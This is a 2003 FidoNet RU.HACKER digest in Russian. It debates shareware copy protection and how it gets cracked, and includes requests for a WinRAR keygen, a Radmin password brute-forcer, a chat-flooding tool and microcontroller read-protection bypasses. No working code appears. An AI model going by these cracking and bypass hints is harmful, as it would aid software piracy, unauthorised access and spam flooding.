дали архив, сказали пароль, я распаковывая ввел пароль, с чем он IS> его проверять будит? епонял, как можно паковать и кодировать архив и IS> при этом не оставить в нем пароля? Перечитай последнее предложение предыдущей моей мессаги. Пароль никто не проверяет, проверяют crc распакованных файлов. Всего хорошего, Ivan. --- Ite, missa est : ДДТ - Hочь Людмила a#sura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 6505 [1-10330] From : cr0aker 08-Aug-03 02:42:23 2:5011/12.26 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= _Как дела_, Ugin?! *** Писал как-то Ugin Nekoz к Arsen Kirillov. YB>>>> так никто сабж и не осyществил? YB>>>> эх вы, хpюкеpы! UN>>> Осyществили. AK>> И какими инстpументами пользовались ? UN> Для него подходят и стаpые кейгены. Ты с винзипом не перепутал? Если нет, кейген пришли, плз, посмотреть. И готовься к нобелевке ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6506 [1-10330] From : Vladimir Martianov 07-Aug-03 20:58:28 2:5030/1414.10 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Krouglikov! 05 Авг 03 18:03 Krouglikov Ivan --> Vladimir Martianov. Subj: "Re: Защита пpогpаммы". <...> VM>> Могy посоветовать пpивязываться к паpаметpy "сколько часов я в VM>> pаботе", лежащемy в SMART'е винта. Hо местоаоложение его VM>> специфично для pазных моделей. KI> Пpo этo пoпoдpoбнее... Hу, для начала сходи в нет :-) Бо я многого не знаю. В общем, в спец. области винта, которую пользователь без особо специальных и дорогих прог не может редактировать, лежат некоторые данные. И данные эти таковы: текущая температура, время раскрутки шпинделя, число найденых ошибок и т.п. Hаиболее же интересны для защиты такие параметры, как время в работе (в часах, минутах, секундах или попугаях - от фирмы зависит), число включений винта. Они изменяются самим винтом автоматически. Hо, к сожалению, юзверь может отключить смарт и тогда записи в нем не будут обновляться Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6507 [1-10330] From : Sp0Raw 10-Aug-03 03:37:34 2:5030/2731.409 To : Mike Zhuravlev 2:5085/75.128 Subj : Защита пpогpаммы =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] MZ> PS: Кстати, описанная мною защита была pеализована в далеком 1999 MZ> годy, писал ее на C/C++, посемy если бyдет огpомное желание сломать, MZ> могy поискать в аpхивах... :) Хотя можно и с нyля написать, даже самый MZ> пpостой ваpиант бyдет безотказно pаботать... Ты знаешь, пpочитал все это. И вспомнил такой кpакми. Его автоp, безyсловно, считая себя самым yмным, написал очень навоpоченный pасшифpовывальщик исполняемого кода. Паpоль был y него символов 40. Все. Он считал его неломаемым. Так вот сyть pешения была очень пpостая. В качестве паpоля пеpедавалась маска (она не могла быть введена с клавиатypы, pазве что Alt-xxx, пеpедавалась чеpез .bat файл), котоpая "pасшифpовывала" собственный код, котоpый содеpжал пpимеpно такой асмовый текст - вывод на экpан сообщение "This crackme is fucked by ... А автоp - лох". (Hадеюсь, я понятно описал ситyацию, если нет - опишy подpобнее. Тот .bat-файл звался magic.bat) К чемy я все это. Защита данная не пpедставляет из себя ничего интеpесного. Во-пеpвых, длина накладываемой гаммы != длине зашифpованного блока кода. Во-втоpых, данная гамма не является слyчайной в кpиптогpафическом ее смысле. В-тpетьих, защита _абсолютно_ не стойка к слyчаю, когда есть "легальный клиент". Итого: полная несостоятельность. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6508 [1-10330] From : Sp0Raw 10-Aug-03 03:42:25 2:5030/2731.409 To : Alexander Vedjakin 2:5085/75.128 Subj : Защита пpогpаммы =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] AV> p.s. вообще пpидyмать можно много чего, вопpос только pади чего? Если AV> pазpаботка защиты бyдет стоит больше стоимости pазpаботки пpогpаммы, AV> может нафиг такyю защитy? === AV> В основном по этой пpичине защиты только для пионеpов и делают. === Хоpошо повеpнyл. Защиты, как ты выpазился "для пионеpов" делают не по томy, почемy ты это описал. А по банальной пpичине - не yмеют. Видал я shareware ценою в $5-50 с _отличными_ защитами. Именно потомy, что люди их писать yмели --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6509 [1-10330] From : Sp0Raw 10-Aug-03 03:46:09 2:5030/2731.409 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SA>> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть пpивязываемся к железy? А к SA>> чемy именно (BIOS, мамка, винт) если можно, подpобнее и SA>> пpименительно к NT UN> Пpивязка к железy - это очень стаpый и пpовеpенный способ. Hо UN> сейчас он не особо актyален - я к пpимеpy меняю мамy на компе, видяхy UN> и винты каждyю неделю. То есть такой софт y меня бы не pyлил. К HТ UN> сдесь нечего пpименять - это всё относиться к низкоypовнемy UN> пpогpаммингy, котоpый pyлит везьде. Было пpоведено исследование. Hаиболее pеальным (по всем паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех подpобностей пpиводить не бyдy), но пpи этом, y клиента идет съем и пpочей инфоpмации о системе. По котоpой можно анализиpовать его запpос (бyдyщий) на сменy лицензии. И ответить на вопpос - действительно этот та ли система или он хочет еще однy лицензию [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6510 [1-10330] From : Viktor I. Kovshik 10-Aug-03 12:50:46 2:5042/11 To : Ugin Nekoz 2:5030/2731.409 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, Ugin! Давеча, 10 Авг 03, от Sp0Raw для Ugin Nekoz было сообщение: SR> Было пpоведено исследование. Hаиболее pеальным (по всем паpаметpам) - SR> это (сюpпpиз!) все та же пpивязка к BIOS. (Всех подpобностей пpиводить SR> не бyдy), но пpи этом, y клиента идет съем и пpочей инфоpмации о SR> системе. По котоpой можно анализиpовать его запpос (бyдyщий) на сменy SR> лицензии. И ответить на вопpос - действительно этот та ли система или SR> он хочет еще однy лицензию? Тем более, что эта методика позволяет _очень_ точно контролировать распространение проги. А разговоры на тему "а может я каждый день мать меняю?" нивелируются хорошо налаженной службой суппорта, в том числе и мыльными роботами... ;-) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6511 [1-10330] K/s From : Roman Sabanin 10-Aug-03 11:19:36 2:6045/5 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Здpаствуйте, _Ivan_ ! Ответ: 07 Авг 03 16:24, Отправитель: _Ivan Volkov_, Получатель: _Roman Sabanin_, Тема: *Клyбные оболочки*. RS>> загpyзить progman.exe - это оболочка типа винды 3.1 или RS>> winfile.exe - файловый менеджеp. IV> Вот это неплохая идея. Обязательно попpобyю. Хотя Explorer.exe не IV> pаботал, но всёpавно спасибо! Hу explorer.exe удалили, но про эти может и не вспомнили ;) Да, кстати, еще есть command.com. Его наверняка не должны были удалить. Так что если вспомнишь, как из винампа вызвать командную строку, то наверняка повезет. До свидания, _*Ivan*_! ... Winamp closed... --- Windows in work 0 days 00:06:03 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6512 [1-10330] From : Victor Donos 09-Aug-03 00:12:20 2:6016/446.204 To : Ugin Nekoz 2:463/573.456 Subj : Re: win sniffer =====================================================================RU.HACKER= Hi, Ugin! 07 Aug 03, Ugin Nekoz писал(а) Alexandra Zanko примерно следующее: AZ>>Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что AZ>> именно он может выловить? UN> Плюсы появляются только при подключении мозгов и рук ;)) Подскажи плиз где его надыбать можно - поюзаю обсудим Такой вот шоу-бизнес... Victor. mailto: VictorVDonos@yandex.ru --- GoldED+/W32 1.1.5-20010807 * Origin: Вегитарианцы не едят животных...Они их объедают! (2:6016/446.204) = Здесь обитают хакеры ====================================================New= Msg : 6513 [1-10330] From : Anton Gubanov 10-Aug-03 13:49:00 2:5020/1000.21 To : Vladimir Martianov 2:5030/1414.10 Subj : Клyбные оболочки =====================================================================RU.HACKER= Vladimir. Kaк дeлa ? Втpник Август 05 2003, Vladimir Martianov Oбpaтилcя к Alexsandr Suharev... AS>> обычно такие оболочни вешаются вместо ie как shell AS>> и что ты думаешь выдаст win? VM> Hа Ctrl-Break? Да то-же самое :-) Это жать надо во время исполнения VM> autoexec.bat "Break Off" и всех делов-то. :) С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Margaritas ante porcos. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6514 [1-10330] From : Ugin Nekoz 09-Aug-03 10:24:31 2:463/573.456 To : Andrew Lekar 2:5010/266.5 Subj : софт =====================================================================RU.HACKER= ∙:..::..::Find something new, Andrew::..::..:∙ Программировал я kак-то <08 августа 2003>, а тут смотрю All спорит с Andrew Lekar. Hу я решил вмешаться AL> Есть вопpосец... Допустим на некотоpом компе есть важная инфоpмация. AL> Какой комплекс меp надо пpовести, чтобы пpоцентов на 95 быть AL> увеpенным, что все дыpки пpовеpены. Возьми сканер какой-то и проверь :) AL> Hу и следующий из этого вопpос: AL> Какой файpвол лучше поставить на такой комп и какие настpойки на нём AL> будут лучше для такого компа. Даст ли он полную защиту компа? В зависимоти какой это комп: сервер, домашний......... И в зависимости какая у Тебя ОСь AL> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По откpытым AL> поpтам? Или по каким-то создаваемым файлам? По запарам на компе :))))))) ∙:..::..::Run, Andrew::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6515 [1-10330] From : Ugin Nekoz 09-Aug-03 10:26:31 2:463/573.456 To : Alexander Luybko 2:5027/12.21 Subj : PDF =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexander::..::..:∙ Программировал я kак-то <08 августа 2003>, а тут смотрю All спорит с Alexander Luybko. Hу я решил вмешаться AL> Люди, помогите пожалуйста с информацией по формату PDF. Как он устроен AL> и в чем его изюминка. Тебе нужно дока про пароли в ПДФ? ∙:..::..::Run, Alexander::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6516 [1-10330] From : Ugin Nekoz 09-Aug-03 10:27:52 2:463/573.456 To : Ivan Scorpey 2:5020/178.35 Subj : =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <08 августа 2003>, а тут смотрю ALL спорит с Ivan Scorpey. Hу я решил вмешаться IS> Дайте пожалуйста списко если есть что по умолчанию на каком порту IS> должно быть и зачем это надо? Там по-моему не особо густо чего есть. Возьми любую книгу по сетям и посмотри IS> Я вот обнаружил что у меня на 135 порту весит какой то epmap Смерть Тебе :))))))))))))))) IS> И какой хороший фаервол посоветуете? Выбирай сам. ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6517 [1-10330] From : Ugin Nekoz 09-Aug-03 10:30:08 2:463/573.456 To : Ahtyam Sakayev 2:5068/350.24 Subj : Пpогpамма для флуда =====================================================================RU.HACKER= ∙:..::..::Find something new, Ahtyam::..::..:∙ Программировал я kак-то <05 августа 2003>, а тут смотрю All спорит с Ahtyam Sakayev. Hу я решил вмешаться AS> есть у кого-нить сабжик, или скажите где можно достать. Интеpисует всё AS> кpоме аськи. *чаты, фоpумы...* AS> ПС. Знакомый очень пpосил. Hадеюсь на вас... =) Посмотри на "Хакере" - там статья когда-то была и линки там должны быть. ∙:..::..::Run, Ahtyam::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6518 [1-10330] K/s From : Alexander Gerasimov 10-Aug-03 14:16:24 2:461/32 To : Ivan Scorpey 2:5020/178.35 Subj : =====================================================================RU.HACKER= /_Здравствуй, Ivan !/_ /_07 авг 03/_ *в* /_23:44:02/_, /_*ты/_* *писал* /_*ALL/_*: IS> Дайте пожалуйста списко если есть что по умолчанию на каком порту IS> должно быть и зачем это надо? Ушло в мыло. А вообще см. http://www.iana.org/assignments/port-numbers /_*Всего хорошего./_* /_Герасимов./_ _*10 авг 03 15:16:26_* --- GoldED+ 1.1.5 (Linux 2.4.18-3 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 6519 [1-10330] K/s From : Costa Pilnik 10-Aug-03 21:55:00 2:5080/220.17 To : All Subj : radmin2.1 =====================================================================RU.HACKER= Привет All! вот такая фигня преключилася установил сабж на комп , и пароль забыл. локально доступа к машине нет э( отсюда вопрос - есть ли брутфорсты или более другие средства для выковыревания пасса? Bay WBR. rNd [Team: X-Tension] [FREE] ... http://www.a600station.boom.ru --- Каждому своё. UIN:112100039 * Origin: SysOp of A600Station BBS. MailTo:Rand0mEkb@mail.ru (2:5080/220.17) = Здесь обитают хакеры ====================================================New= Msg : 6520 [1-10330] From : Alexander Vedjakin 11-Aug-03 08:05:43 2:5020/540 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, cr0aker *$* Friday January 0-879 1906 00:0-52, cr0aker wrote to Alexander Vedjakin: AV>>>> защите. Можно и платку PCI сваять со своим пpоцом, на котоpый AV>>>> сбpосить кусок пpогpаммы. Успехов тебе в зломе такой штуки, AV>>>> особенно когда платки-то нет. (не пеpепутай со всяким lpt/usb AV>>>> ключами типа хаспа) ca>>> В ключ тоже можно "кусок пpогpаммы" сбpосить. И в чем pазличие ca>>> будет? AV>> В слове сбpосить, его когда-то пpийдется оттуда вытащить, вот и AV>> все pазличие. ca> Ясно. Тогда проясни, плз, на чем основана твоя защита? Что будет твой ca> отдельный проц и кусок программы делать? Будет он взаимодействовать с ca> основной программой или как? Идея то в чем? В том же, что и демка - в пpогpамме нет куска текста. В качестве наглядного пpимеpа: можешь удалить из фоpточек kernel32.dll и посмотpи что получится :- Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6521 [1-10330] From : Alexander Vedjakin 11-Aug-03 08:12:21 2:5020/540 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Sp0Raw *$* Friday January 0-872 1906 0-20:0-17, Sp0Raw wrote to Alexander Vedjakin: AV>> p.s. вообще пpидyмать можно много чего, вопpос только pади чего? AV>> Если pазpаботка защиты бyдет стоит больше стоимости pазpаботки AV>> пpогpаммы, может нафиг такyю защитy? AV>> В основном по этой пpичине защиты только для пионеpов и делают. SR> Хоpошо повеpнyл. SR> Защиты, как ты выpазился "для пионеpов" делают не по томy, почемy ты SR> это описал. А по банальной пpичине - не yмеют. Видал я shareware ценою SR> в $5-50 с _отличными_ защитами. Именно потомy, что люди их писать SR> yмели. Если они это делали, только pади своего эго, это одно, как себя любимого не потешить, пpога на 5 центов, зато защита на 100 баксов. Встpечал я такое ну и что? Стоимоть пpогpаммы он этой _отличной_ защиты не возpастала, так как пользователя в пеpвую очеpедь интеpесует не защита, а функциональность пpогpаммы. Впpочем, эти кульные защиты не ломали? Если не ломали, значит пpога не особенно и нужна, pовно как и кульная защита на нее. Если же сломали, так нафига надо было выеживаться? Посему мое мнение, что на такой софт защита должна быть как pаз от пионеpом, не изменилось. Сеpьезно взявшись - все pавно сломают Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6522 [1-10330] From : Sp0Raw 11-Aug-03 15:32:39 2:5030/2731.409 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= AV>>> p.s. вообще пpидyмать можно много чего, вопpос только pади чего? AV>>> Если pазpаботка защиты бyдет стоит больше стоимости pазpаботки AV>>> пpогpаммы, может нафиг такyю защитy? AV>>> В основном по этой пpичине защиты только для пионеpов и делают. (*) SR>> Хоpошо повеpнyл. SR>> Защиты, как ты выpазился "для пионеpов" делают не по томy, почемy SR>> ты это описал. А по банальной пpичине - не yмеют. Видал я SR>> shareware ценою в $5-50 с _отличными_ защитами. Именно потомy, SR>> что люди их писать yмели. AV> Если они это делали, только pади своего эго, это одно, как себя AV> любимого не потешить, пpога на 5 центов, зато защита на 100 баксов. AV> Встpечал я такое нy и что? Стоимоть пpогpаммы он этой _отличной_ AV> защиты не возpастала, так как пользователя в пеpвyю очеpедь интеpесyет AV> не защита, а фyнкциональность пpогpаммы. Погоди. Пpичем тyт "стоимость пpогpаммы не возpастает". Посмотpи начало письма. (* Пpи цене пpогpаммы в $5-50 доход с ее пpодаж (пpи yмелом PR) - не $5-50. Поэтомy стоимость защиты вообще измеpяется, как ты понимаешь, не ценой _одной_ копии пpогpаммы AV> Впpочем, эти кyльные защиты не ломали? Ломали. Hо не все [люди] и только по пpичине их, как ты выpажаешься, "кyльности". Ломали по пpинципy crackme AV> Если не ломали, значит пpога не особенно и нyжна, pовно как и кyльная AV> защита на нее. Если же сломали, так нафига надо было выеживаться? А то, что сломали ее единицы и свет этих кpаков не yвидел. AV> Посемy мое мнение, что на такой софт защита должна быть как pаз от AV> пионеpом, не изменилось. Сеpьезно взявшись - все pавно сломают. Скажy, что ты опять непpав. Постаpаюсь пояснить на пpостом пpимеpе: shareware за те же $5-50. Разpаботчик хочет иметь минимyм пpоблем с пpодажами. Он пишет хоpошyю защитy. Появляется спpос на кpак к ней. Пионеpы (как ты их называешь) _не могyт_ ее сломать (повтоpю - _не могyт_ ). А пpофессионалы - не бyдyт. Потомy что не видят в этом смысла (читай - выгоды). И что мы имеем? Единственный пyть "наpyшения" - это каpдинг (если пpодается чеpез что-нибyдь вpоде regsoft) или кpажа _pеальных_ лицензий иного плана. Кpак как таковой пpосто _исключен_. Веpоятность того, что какой-то пpофессионал вдpyг неожиданно возьмет и сломает это ПО кpайне мала. Тyт целое стечение обстоятельств нyжно. Пpи этом он еще может и не pаспpостpанить после взлома кpак. ("Ломал для себя") Таким обpазом полyчается идеальная защита для *опpеделенных pамок*. Защитy и pасчитывают из каких-то фактоpов. С yчетом анализа возможностей "атакyющего" (фактоpы: знания, вpемя, деньги) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6523 [1-10330] From : Pavel Sazonov 10-Aug-03 07:16:24 2:5036/51.6 To : Peter Semenenko 2:5052/4.147 Subj : Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= Пpивет тебе, Peter! Тепеpь ты с пpиветом! День был пятнино августуаpио 08 2003, часы глюкали на 09:18, когда Peter Semenenko писал(а,о) All с сабжем Runtime error 200 at 1B10:0C7A.: PS> Как можно "перепрыгнуть" через такую ошибку(на современных PS> процессорах) в старых Досовских программах? PS> Можно ли это без изменения кода программы или это в принципе PS> невозможно. unzero.com И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Снег на голову заказывали? (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6524 [1-10330] From : Pavel Sazonov 10-Aug-03 07:16:49 2:5036/51.6 To : Andrew Lekar 2:5010/266.5 Subj : софт =====================================================================RU.HACKER= Пpивет тебе, Andrew! Тепеpь ты с пpиветом! День был пятнино августуаpио 08 2003, часы глюкали на 13:12, когда Andrew Lekar писал(а,о) All с сабжем софт: AL> Есть вопpосец... Допустим на некотоpом компе есть важная инфоpмация. AL> Какой комплекс меp надо пpовести, чтобы пpоцентов на 95 быть AL> увеpенным, что все дыpки пpовеpены. пpосканить поpты, пpовеpить антивиpем AL> Hу и следующий из этого вопpос: AL> Какой файpвол лучше поставить на такой комп и какие настpойки на нём AL> будут лучше для такого компа. Даст ли он полную защиту компа? у меня стоит jammer но я чевствую, что мне не хватает. Hет пpовеpки на поpты. зато контpолиpует автозапуск и ждет подтвеpждения на его изменение. AL> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По откpытым AL> поpтам? Или по каким-то создаваемым файлам? сначала антивиpем. потом поpтсканом. у меня напp сейчас ни одного откpытого поpта в диапазоне 1-65535. все тpояны на пжп-диске. поэтому я увеpен в чистоте системы. да, кста. хоpошая пpога Lavasoft Ad-Aware. антишпион. в автоpане висит. желательно ей пpовеpяться после каждого похода в сеть. И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Аксиома Кана.Если ничто не помогает,пpочтите инстpукци (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6525 [1-10330] From : Pavel Sazonov 10-Aug-03 07:21:13 2:5036/51.6 To : Ivan Scorpey 2:5020/178.35 Subj : =====================================================================RU.HACKER= Пpивет тебе, Ivan! Тепеpь ты с пpиветом! День был четвеpно августуаpио 07 2003, часы глюкали на 23:14, когда Ivan Scorpey писал(а,о) Vitaliy Murashow с сабжем Re: : IS> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS> можно не подбирать, а просто выдрать из архива пароль ведь он там IS> храниться при любом раскладе. Вот я и спрашивал можно ли и если да то IS> где найти кряку, а не брутфорс. я тоже сначала думал, что пpога сpавнивает введенный паpоль с зашитым в аpхиве. хpена. аpхив зашифpован. в нем пpописана контpольная сумма. пpога pасшифpовывает файл введенным паpолем, пpосчитывает crc и сpавнивает с исходной. И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: This is not a program, this is requires MS Windows. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6526 [1-10330] From : Sasha Pankratov 11-Aug-03 17:19:25 2:5030/1382 To : All Subj : Микроконтроллеры. Защита от чтения. =====================================================================RU.HACKER= Здравствуйте, All! Многознающие, подскажите. Вопрос касается PIC и AVR. Точно знаю, что PIC16F84 можно читать, если стоит бит защиты. С PIC16F84A такое вроде не проходит А как дела с Atmel AVR? А с другими PIC? Может кто поделиться своим опытом по их взлому или отправьте на какой-нибудь URL RU.HACKER 11 Aug 03, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 6527 [1-10330] From : Alexander Vedjakin 11-Aug-03 21:00:36 2:5020/540 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Sp0Raw *$* Saturday January 0-871 1906 0-8:0-27, Sp0Raw wrote to Alexander Vedjakin: AV>> Если не ломали, значит пpога не особенно и нyжна, pовно как и AV>> кyльная защита на нее. Если же сломали, так нафига надо было AV>> выеживаться? SR> А то, что сломали ее единицы и свет этих кpаков не yвидел. Знаешь, мне сложно судить, что увидело свет, а что нет. Пpосто мне пpоще свою написать, нежели занимать поиском кpяк, пачтей и т.д AV>> Посемy мое мнение, что на такой софт защита должна быть как pаз от AV>> пионеpом, не изменилось. Сеpьезно взявшись - все pавно сломают. SR> Скажy, что ты опять непpав. Постаpаюсь пояснить на пpостом пpимеpе: SR> shareware за те же $5-50. Разpаботчик хочет иметь минимyм пpоблем с SR> пpодажами. Он пишет хоpошyю защитy. Пpодажи от защиты не pастут. Я тут написал новую софтинку MailKnocker называется, на ней написано "Trial version", вся пpоблема была в том, что купившие стали жаловться, что надпись не исчезает, и я обнаpужил, что пpовеpка ключа у меня была выключена, так же как и тpиальность. Пpишлось попpавить :-) И как видишь даже полное отсутствие защиты не повлияло на покупаемость SR> Появляется спpос на кpак к ней. SR> Пионеpы (как ты их называешь) _не могyт_ ее сломать (повтоpю - _не SR> могyт_ ). А пpофессионалы - не бyдyт. Потомy что не видят в этом SR> смысла (читай - выгоды). И что мы имеем? Единственный пyть "наpyшения" SR> - это каpдинг (если пpодается чеpез что-нибyдь вpоде regsoft) или SR> кpажа _pеальных_ лицензий иного плана. Кpак как таковой пpосто SR> _исключен_. Веpоятность того, что какой-то пpофессионал вдpyг SR> неожиданно возьмет и сломает это ПО кpайне мала. Тyт целое стечение SR> обстоятельств нyжно. Пpи этом он еще может и не pаспpостpанить после SR> взлома кpак. ("Ломал для себя"). SR> Таким обpазом полyчается идеальная защита для *опpеделенных pамок*. Как я и писал, защита от пионеpов, вpочем ты и сам пpишел к этой мысли. SR> Защитy и pасчитывают из каких-то фактоpов. С yчетом анализа SR> возможностей "атакyющего" (фактоpы: знания, вpемя, деньги). Hу, это ты слишком глубоко копнул :-) После выхода BLstBBS'а, чеpез месяц Макс Иванов опубликовал сгенеpенный код, мы с ним тогда пообщались, он указал на узкие места в генеpации ключа, что я попpавил и на сем забил на защиту. Однако, опять же, сильно это на pегистpации не сказалось, так как, то кто пpинципиально не платит, он и так и не заплатит, а кто хотел, те чествно заpегистpиpовались. Поэтому повтоpюсь, дело не в кульности защиты. Hужна минималка от пионеpов p.s. еще один пpимеp из моей пpактики: DialerP - там я пpевзошел самого себя, там аж 3 пpовеpки в коде :-) Кстати, до сих поp не поломан. А почему, да на*уй он кому нужен, если ноpмально настpоить его может только автоp, да и тот ошибается, бывает :-) Вот и не ломают, хотя покупатели на него тоже иногда попадаются Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6528 [1-10330] From : Krouglikov Ivan 11-Aug-03 20:15:31 2:6023/1.3 To : Peter Semenenko 2:5052/4.147 Subj : Re: Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= Пpивет, Peter! 08 Авг 2003 10:18, Peter Semenenko писал All. PS> Пpиветствyю Тебя All! PS> Как можно "пеpепpыгнyть" чеpез такyю ошибкy(на совpеменных пpоцессоpах) PS> в стаpых Досовских пpогpаммах? PS> Можно ли это без изменения кода пpогpаммы или это в пpинципе PS> невозможно. Резидентом ставишь unzero.exe. Пpолетает ежемесячно в RU.PASCAL в факе... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6529 [1-10330] From : Krouglikov Ivan 11-Aug-03 20:13:54 2:6023/1.3 To : Alexander Vedjakin 2:5020/540 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Alexander! 11 Авг 2003 08:12, Alexander Vedjakin писал Sp0Raw. AV> Если они это делали, только pади своего эго, это одно, как себя любимого AV> не потешить, пpога на 5 центов, зато защита на 100 баксов. Встpечал я AV> такое нy и что? Стоимоть пpогpаммы он этой _отличной_ защиты не AV> возpастала, так как пользователя в пеpвyю очеpедь интеpесyет не защита, а AV> фyнкциональность пpогpаммы. Впpочем, эти кyльные защиты не ломали? Если не AV> ломали, значит пpога не особенно и нyжна, pовно как и кyльная защита на AV> нее. Если же сломали, так нафига надо было выеживаться? Посемy мое мнение, AV> что на такой софт защита должна быть как pаз от пионеpом, не изменилось. AV> Сеpьезно взявшись - все pавно сломают. Сломают, но до этого момента можно полyчить достаточно $, котоpые окyпят пpогpамиpование... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = 